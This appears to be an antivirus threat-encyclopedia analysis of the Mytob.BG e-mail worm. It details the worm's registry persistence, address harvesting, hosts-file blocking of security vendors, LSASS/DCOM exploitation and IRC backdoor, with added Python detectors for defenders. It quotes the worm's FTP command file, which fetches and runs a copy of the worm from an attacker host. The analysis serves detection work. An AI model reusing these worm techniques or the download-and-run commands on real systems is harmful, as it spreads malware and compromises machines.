Threat Encyclopedia


Win32/Mytob.BG

Aliases: W32/Mytob-BZ (Sophos), W32/Mytob.BE.worm (Panda), Net-Worm.Win32.Mytob.x (Kaspersky)
Type: Mass mailing e-mail worm
Affects: 32-bit Windows

Summary:

MyTob.BG is a 64 kilobyte mass mailing e-mail worm that is runtime compressed by PECompact, an executable runtime protector.

Installation and Autostart Techniques:

Upon execution, the worm copies itself into the %System% folder as "taskgmr.exe".

Note: %System% denotes the Windows System directory (e.g. C:\WINDOWS\SYSTEM32); its location differs between versions of Microsoft Windows.

It also drops the component, HELLMSN.EXE (6050 bytes in size), in the root directory, which is usually C:\. This dropped component is detected by NOD32 as W32/Mytob.I (MSN Messenger Spreading Component) and is runtime compressed by FSG.

Mytob.BG creates copies of itself in the root directory with the following names:

"funny_pic.scr"
"my_photo2005.scr "
"see_this!!.scr"

The worm creates a mutex "H-E-L-L-B-O-T" to avoid multiple running instances of the worm on one machine.

The following registry values are added to make sure that MyTob.BG runs every time Windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINRUN" = "taskgmr.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINRUN" = "taskgmr.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"WINRUN" = "taskgmr.exe"

The following registry keys are added as well:

HKLM\Software\Microsoft\OLE
"WINRUN" = "taskgmr.exe"

HKCU\Software\Microsoft\OLE
"WINRUN" = "taskgmr.exe"

HKLM\System\CurrentControlSet\Control\Lsa
"WINRUN" = "taskgmr.exe"

HKCU\System\CurrentControlSet\Control\Lsa
"WINRUN" = "taskgmr.exe"

Note: The worm watches continuously for the presence of these registry keys and recreates them if they are not present anymore.
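The persistence entries above are easy to audit from a registry export taken off a suspect machine. The following Python script is an added example, not part of the original write-up or of NOD32; it parses the `[key]` / `"name"="data"` lines of a `.reg` export and reports values in the listed autostart, OLE and Lsa keys that either carry the worm's `WINRUN` value name or point at a file named `taskgmr.exe`. The sample export embedded in the script is constructed for the demonstration.

```python
import re

# Autostart keys named in the write-up, plus the unusual OLE and Lsa keys it
# also writes. Hive names are normalised to hklm/hkcu before comparison.
PERSISTENCE_KEYS = {
    r"hklm\software\microsoft\windows\currentversion\run",
    r"hklm\software\microsoft\windows\currentversion\runservices",
    r"hkcu\software\microsoft\windows\currentversion\run",
    r"hklm\software\microsoft\ole",
    r"hkcu\software\microsoft\ole",
    r"hklm\system\currentcontrolset\control\lsa",
    r"hkcu\system\currentcontrolset\control\lsa",
}
# Value name and data the worm writes (from the write-up).
IOC_VALUE_NAME = "winrun"
IOC_DATA = "taskgmr.exe"

HIVE_ALIASES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu"}
VALUE_LINE = re.compile(r'^"([^"]*)"\s*=\s*"(.*)"\s*$')


def normalise_key(key):
    hive, sep, rest = key.strip().lower().partition("\\")
    return HIVE_ALIASES.get(hive, hive) + sep + rest


def parse_reg_export(text):
    """Parse a .reg export into {normalised_key: {value_name: data}}.
    Only string (REG_SZ) values are read, which is all this check needs;
    the .reg escaping of backslashes and quotes is undone."""
    result = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = normalise_key(line[1:-1])
            result.setdefault(current, {})
        elif current is not None:
            m = VALUE_LINE.match(line)
            if m:
                data = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
                result[current][m.group(1).lower()] = data
    return result


def find_mytob_persistence(text):
    """Return sorted (key, value_name, data) tuples found in the listed keys
    whose value name is WINRUN or whose data ends in taskgmr.exe."""
    hits = []
    for key, values in parse_reg_export(text).items():
        if key not in PERSISTENCE_KEYS:
            continue
        for name, data in values.items():
            if name == IOC_VALUE_NAME or data.lower().endswith(IOC_DATA):
                hits.append((key, name, data))
    return sorted(hits)


# Constructed sample export: two worm entries, one renamed copy with a full
# path, and one WINRUN value outside any listed key (ignored by the check).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"WINRUN"="taskgmr.exe"
"SecurityScan"="C:\\Program Files\\AV\\scan.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Windows\\taskgmr.exe"

[HKEY_CURRENT_USER\Software\Microsoft\OLE]
"WINRUN"="taskgmr.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Foo]
"WINRUN"="taskgmr.exe"
'''

if __name__ == "__main__":
    for key, name, data in find_mytob_persistence(SAMPLE_EXPORT):
        print(f"{key}  {name} = {data}")
```

Because the worm recreates these values when they are removed, a single clean pass is not proof of disinfection; re-run the check after the running process has been stopped.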

E-mail Harvesting:

MyTob.BG scans all fixed disks and attempts to collect e-mail addresses from files whose extension matches one of the following:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl

Due to a bug in the way the worm concatenates and compares strings against the WIN32_FIND_DATA results, MyTob.BG will attempt to harvest e-mail addresses from any file whose extension matches a run of characters from the extension list in the correct order, even if only one character matches.

In technical terms, the worm tests the file extension with a substring ("instring") comparison rather than an exact match.

For example, the worm will search for e-mail addresses in files where the file extension matches *.h, *.ht, and *.htm.
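The practical consequence of the substring bug is that the worm reads files an analyst would not expect, which matters when scoping what a compromised host may have leaked. The following Python snippet is an added illustration, not the worm's code: `buggy_extension_match` is an assumed reconstruction of the flawed check as the write-up describes it (the extension is looked for as a substring of the joined extension list), `strict_extension_match` is the exact comparison evidently intended, and `over_matched` lists the files that only the flawed check would open. The file names are constructed.

```python
# Extensions the write-up says the worm looks for.
TARGET_EXTENSIONS = ["wab", "adb", "tbb", "dbx", "asp", "php", "sht", "htm", "pl"]


def extension_of(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def buggy_extension_match(filename):
    """Assumed reconstruction of the flawed check described in the write-up:
    the file's extension is tested as a substring of the concatenated
    extension list, so any prefix of a listed extension (".h", ".ht") passes."""
    ext = extension_of(filename)
    joined = ".".join(TARGET_EXTENSIONS)
    return ext != "" and ext in joined


def strict_extension_match(filename):
    """The check evidently intended: exact membership in the extension list."""
    return extension_of(filename) in TARGET_EXTENSIONS


def over_matched(filenames):
    """Files the flawed check would open that the strict check would not."""
    return [f for f in filenames
            if buggy_extension_match(f) and not strict_extension_match(f)]


# Constructed file names: ".h", ".ht" and ".db" are all substrings of listed
# extensions and are therefore read by the worm; ".c", ".txt", ".doc" are not.
SAMPLE_FILES = ["mail.dbx", "index.htm", "notes.h", "page.ht", "config.db",
                "main.c", "readme.txt", "report.doc", "script.pl"]

if __name__ == "__main__":
    print("read only because of the bug:", over_matched(SAMPLE_FILES))
```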

Mytob.BG also collects e-mail addresses from the Windows Address Book and from the following folders:

%Windir%\Temporary Internet Files
%Userprofile%\Local Settings\Temporary Internet Files
%System%

DNS Resolving:

The worm performs DNS MX (mail exchanger) queries to find an appropriate mail server for each domain it tries to send itself to. If the MX lookup fails, the worm tries to guess the mail server's host name by prepending each of the following prefixes to the domain name:

gate.
mx.
mail.
smtp.
mx1.
mxs.
mail1.
relay.
ns.
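This MX-then-guess behaviour is visible in DNS server logs: an ordinary workstation hands mail to a relay and never issues MX queries, and the fallback A queries for `mail.`, `smtp.`, `mx.` and similar names follow the failed MX lookup for the same domain from the same client. The following Python detector is an added example, not part of the original write-up; the log line format (`time client qtype qname`) and the sample lines are constructed for the demonstration, and the threshold of five distinct MX-queried domains is an assumed tuning value.

```python
from collections import defaultdict

# Prefixes the worm prepends when an MX lookup fails (from the write-up).
FALLBACK_PREFIXES = ("gate.", "mx.", "mail.", "smtp.", "mx1.", "mxs.",
                     "mail1.", "relay.", "ns.")


def parse_dns_log(lines):
    """Each line: '<time> <client_ip> <qtype> <qname>' (constructed format).
    Malformed lines are skipped; names are lower-cased and the trailing dot
    of a fully qualified name is dropped."""
    records = []
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        t, client, qtype, qname = parts
        records.append((t, client, qtype.upper(), qname.lower().rstrip(".")))
    return records


def find_mass_mailer_clients(lines, mx_threshold=5):
    """Return {client: report} for clients that either issue MX queries for at
    least mx_threshold distinct domains, or follow an MX query with A queries
    for the worm's guessed host-name prefixes on the same domain."""
    mx_domains = defaultdict(set)
    fallback_hits = defaultdict(list)
    for _, client, qtype, qname in parse_dns_log(lines):
        if qtype == "MX":
            mx_domains[client].add(qname)
        elif qtype == "A":
            for prefix in FALLBACK_PREFIXES:
                base = qname[len(prefix):]
                if qname.startswith(prefix) and base in mx_domains[client]:
                    fallback_hits[client].append(qname)
                    break
    report = {}
    for client in set(mx_domains) | set(fallback_hits):
        n_mx = len(mx_domains[client])
        if n_mx >= mx_threshold or fallback_hits[client]:
            report[client] = {"mx_domains": n_mx,
                              "fallback_queries": sorted(fallback_hits[client])}
    return report


# Constructed sample: 10.0.0.5 behaves like the worm, 10.0.0.9 is an ordinary
# workstation, 10.0.0.7 is a single legitimate MX lookup (e.g. a mail relay).
SAMPLE_LOG = """
10:00:01 10.0.0.5 MX example-one.test
10:00:01 10.0.0.5 MX example-two.test
10:00:02 10.0.0.5 A mail.example-two.test
10:00:02 10.0.0.5 A smtp.example-two.test
10:00:03 10.0.0.5 MX example-three.test
10:00:04 10.0.0.9 A www.example-one.test
10:00:05 10.0.0.9 A intranet.corp.test
10:00:06 10.0.0.7 MX corp.test
""".strip().splitlines()

if __name__ == "__main__":
    for client, info in find_mass_mailer_clients(SAMPLE_LOG).items():
        print(client, info)
```

In a real deployment the MX threshold should be applied per time window and mail relays should be whitelisted; the fallback-prefix rule needs no tuning because legitimate clients do not guess mail server names.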

E-mail Sender:

The worm spoofs the sender's e-mail address using a name from the following list:

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom

The domain name attached to the sender's name is randomly selected from the following list:

aol.com cia.gov fbi.gov hotmail.com juno.com msn.com yahoo.com

The domain names are stored in the worm ROT-13 encoded.

Mytob.BG uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.

E-mail Subjects:

MyTob.BG randomly selects a subject line from the following list:

Error
Status
Server Report
Mail Transaction Failed
Mail Delivery System
hello
Good day

The e-mail subjects are stored in the worm ROT-13 encoded.
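Because the sender domains and subject lines are stored ROT-13 encoded, a plain `strings` run over an unpacked sample does not show them. The following Python snippet is an added example, not part of the original write-up: it extracts printable ASCII runs from a byte blob (the classic `strings` behaviour), ROT-13 decodes each and reports those that decode to one of the plaintexts the write-up lists. The byte blob is constructed for the demonstration and is not data from the worm.

```python
import codecs
import re

# Strings the write-up says are stored ROT-13 encoded in the worm.
KNOWN_DOMAINS = ["aol.com", "cia.gov", "fbi.gov", "hotmail.com", "juno.com",
                 "msn.com", "yahoo.com"]
KNOWN_SUBJECTS = ["Error", "Status", "Server Report", "Mail Transaction Failed",
                  "Mail Delivery System", "hello", "Good day"]


def rot13(s):
    return codecs.decode(s, "rot_13")


def printable_strings(blob, min_len=4):
    """Return runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def find_rot13_strings(blob, known):
    """Return {decoded: raw} for every printable run whose ROT-13 decoding is
    one of the known plaintexts (compared case-insensitively)."""
    wanted = {k.lower() for k in known}
    hits = {}
    for raw in printable_strings(blob):
        decoded = rot13(raw)
        if decoded.lower() in wanted:
            hits[decoded] = raw
    return hits


# Constructed sample blob: a fake header, four ROT-13 encoded strings and an
# unrelated import name, separated by NUL bytes.
SAMPLE_BLOB = (b"MZ\x90\x00\x03\x00"
               b"ubgznvy.pbz\x00nby.pbz\x00Znvy Qryvirel Flfgrz\x00uryyb\x00"
               b"kernel32.dll\x00")

if __name__ == "__main__":
    for decoded, raw in find_rot13_strings(SAMPLE_BLOB,
                                           KNOWN_DOMAINS + KNOWN_SUBJECTS).items():
        print(f"{raw!r} -> {decoded!r}")
```

The same loop, with the known list replaced by any plaintext an analyst expects, is a quick way to confirm that a new sample belongs to this family before deeper analysis.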

Message Body:

The e-mail contains one of the following messages:

Mail transaction failed. Partial message is available.

The message contains Unicode characters and has been sent as a binary attachment.

The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.

The original message was included as an attachment.

Here are your banks documents.

A blank message body or random strings may also be sent.

E-mail Attachments:

The worm attaches a copy of itself using one of the following file names:

body
message
test
data
file
text
readme
document

And one of the following file extensions:

bat
cmd
exe
scr
pif
zip

The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions, the first chosen from the following list:

htm
txt
doc

The second extension is chosen from the following list and is separated from the first extension by a large number of spaces to hide the executable file extension:

pif
scr
exe

Example: attachment "text.zip" may contain a file named "text.txt .scr"
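Both attachment tricks above (a directly attached executable, or a ZIP whose member carries a decoy extension, a long run of spaces, and then an executable extension) can be caught at the mail gateway without executing anything. The following Python screener is an added example, not part of the original write-up: `screen_attachment` flags executable attachments by extension and opens ZIP attachments in memory to inspect member names for the whitespace-padded double extension. The sample archives are constructed with the helper at the bottom.

```python
import io
import re
import zipfile

# Directly attached executable extensions, and the decoy/real extension pairs
# used inside ZIP attachments (both lists from the write-up).
EXECUTABLE_EXTS = {"bat", "cmd", "exe", "scr", "pif"}
DECOY_EXTS = {"htm", "txt", "doc"}
# A decoy extension, a run of whitespace, then an executable extension.
PADDED_DOUBLE_EXT = re.compile(
    r"\.(%s)\s+\.(%s)$" % ("|".join(DECOY_EXTS), "|".join(EXECUTABLE_EXTS)),
    re.IGNORECASE)


def extension_of(name):
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def inspect_zip_members(data):
    """Return (member_name, reason) findings for a ZIP archive given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            base = member.rsplit("/", 1)[-1]
            if PADDED_DOUBLE_EXT.search(base):
                findings.append((member, "whitespace-padded double extension"))
            elif extension_of(base.strip()) in EXECUTABLE_EXTS:
                findings.append((member, "executable inside archive"))
    return findings


def screen_attachment(filename, data):
    """Screen one attachment. Returns a list of (name, reason) findings;
    an empty list means nothing suspicious was seen."""
    ext = extension_of(filename)
    if ext in EXECUTABLE_EXTS:
        return [(filename, "executable attachment")]
    if ext == "zip":
        try:
            return inspect_zip_members(data)
        except zipfile.BadZipFile:
            return [(filename, "zip attachment that does not parse")]
    return []


def build_sample_zip(members):
    """Constructed helper: build an in-memory ZIP from {name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: the padded double-extension trick and a benign archive.
SAMPLE_ZIP = build_sample_zip({"text.txt" + " " * 60 + ".scr": b"MZ..."})
CLEAN_ZIP = build_sample_zip({"report.txt": b"quarterly figures"})

if __name__ == "__main__":
    for name, data in [("document.pif", b"MZ"), ("text.zip", SAMPLE_ZIP),
                       ("data.zip", CLEAN_ZIP)]:
        print(name, screen_attachment(name, data) or "clean")
```

Padding with spaces defeats a reader's eye, not a regular expression; the check is on the member name alone, so the archive's contents never need to be extracted to disk.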

The worm avoids e-mail addresses which contain parts of the following list:

.gov, .mil, abuse, accoun, acketst, admin, anyone, arin., avp, be_loyal:, berkeley,
borlan, bsd, bugs, certific, contact, example, fcnz, feste, fido, foo., fsf., gnu, gold-certs,
google, gov., help, hotmail, iana, ibm.com, icrosof, icrosoft, ietf, info, inpris, isc.o,
isi.e, kernel, linux, listserv, math, mit.e, mozilla, msn., mydomai, nobody, nodomai,
noone, not, nothing, ntivi, page, panda, pgp, postmaster, privacy, rating, rfc-ed, ripe.,
root, ruslis, samples, secur, sendmail, service, site, soft, somebody, someone, sopho,
spm, submit, support, syma, tanford.e, the.bat, unix, usenet, utgers.ed, webmaster,
www, you, your, -._!, -._!@

The comparison is not case sensitive: both "microsoft.com" and "Microsoft.com" will be avoided.

Hostfile Manipulation:

The current hosts file is overwritten with the following data to prevent access to these sites:

127.0.0.1 www.trendmicro.com
127.0.0.1 www.microsoft.com
127.0.0.1 trendmicro.com
127.0.0.1 rads.mcafee.com
127.0.0.1 customer.symantec.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 secure.nai.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 www.my-etrust.com
127.0.0.1 my-etrust.com
127.0.0.1 mast.mcafee.com
127.0.0.1 ca.com
127.0.0.1 www.ca.com
127.0.0.1 networkassociates.com
127.0.0.1 www.networkassociates.com
127.0.0.1 avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 kaspersky.com
127.0.0.1 www.f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 viruslist.com
127.0.0.1 www.viruslist.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mcafee.com
127.0.0.1 www.mcafee.com
127.0.0.1 sophos.com
127.0.0.1 www.sophos.com
127.0.0.1 symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 www.symantec.com
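A hosts file that pins security-vendor names to a fixed address is a strong sign of tampering, since those names should only ever be resolved through DNS. The following Python audit is an added example, not part of the original write-up: it parses a hosts file, ignoring comments and malformed lines, and reports every entry for a known vendor domain or a host under it. It goes slightly beyond the write-up by flagging such entries whatever address they point at, not only 127.0.0.1. The vendor domain set is derived from the list above, and the sample hosts file is constructed.

```python
import ipaddress

# Registrable domains from the hosts entries the write-up lists.
VENDOR_DOMAINS = {
    "trendmicro.com", "microsoft.com", "mcafee.com", "symantec.com",
    "nai.com", "my-etrust.com", "ca.com", "networkassociates.com",
    "avp.com", "kaspersky.com", "f-secure.com", "viruslist.com",
    "symantecliveupdate.com", "sophos.com",
}


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs from hosts-file text.
    Comments, blank lines and lines with an unparsable address are skipped."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        for host in parts[1:]:
            yield ip, host.lower().rstrip(".")


def vendor_domain_of(host, known):
    """Return the known vendor domain that host equals or sits under, else None."""
    for dom in known:
        if host == dom or host.endswith("." + dom):
            return dom
    return None


def find_hijacked_entries(text, known=VENDOR_DOMAINS):
    """Return sorted (hostname, address) pairs for every hosts-file entry that
    pins a known vendor domain to a fixed address."""
    hits = set()
    for ip, host in parse_hosts(text):
        if vendor_domain_of(host, known):
            hits.add((host, str(ip)))
    return sorted(hits)


# Constructed sample: normal loopback entries, an internal host, and three
# vendor names blackholed the way the write-up describes.
SAMPLE_HOSTS = """# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
10.1.2.3        intranet.corp.test   # internal
127.0.0.1 www.symantec.com
127.0.0.1 liveupdate.symantecliveupdate.com
0.0.0.0 update.symantec.com
"""

if __name__ == "__main__":
    for host, addr in find_hijacked_entries(SAMPLE_HOSTS):
        print(f"{host} -> {addr}")
```

On Windows the file to read is %System%\drivers\etc\hosts; a clean file contains only loopback entries and whatever an administrator added deliberately.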

Exploiting Vulnerabilities:

MyTob.BG generates random IP addresses and attempts to connect to TCP port 445 on each of them to exploit the LSASS buffer overflow vulnerability [see MS04-011]. If the exploit succeeds, it executes code (shellcode) on the target machine which instructs it to connect back to the source in order to retrieve a copy of the worm. (This copy is transferred to the target machine over an FTP connection using the 2pac.txt FTP command file.)

The DCOM RPC vulnerability [see MS03-026] is also exploited for replication.

The 2pac.txt file contains the following FTP commands:

open %IP% %TCP port%
user hell rulez
binary
get bingoo.exe
quit

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of itself named "bingoo.exe" and starts this file after downloading.

References:

http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Other Details:

MyTob.BG provides IRC backdoor functionality with the following functions:

Download files
Download new worm updates
Execute files
Provide uptime information to the remote controller
Provide information about the worm variant to the remote controller
Notify IRC Channels/Operator via private message
Restart the computer

MyTob.BG tries to connect to no.siberkorsan.com on port 6667 (TCP/IP).

The worm is able to send copies via MSN Messenger to all online contacts in the contact list.

History: Analysis and Write-up by: Michael St. Neitzel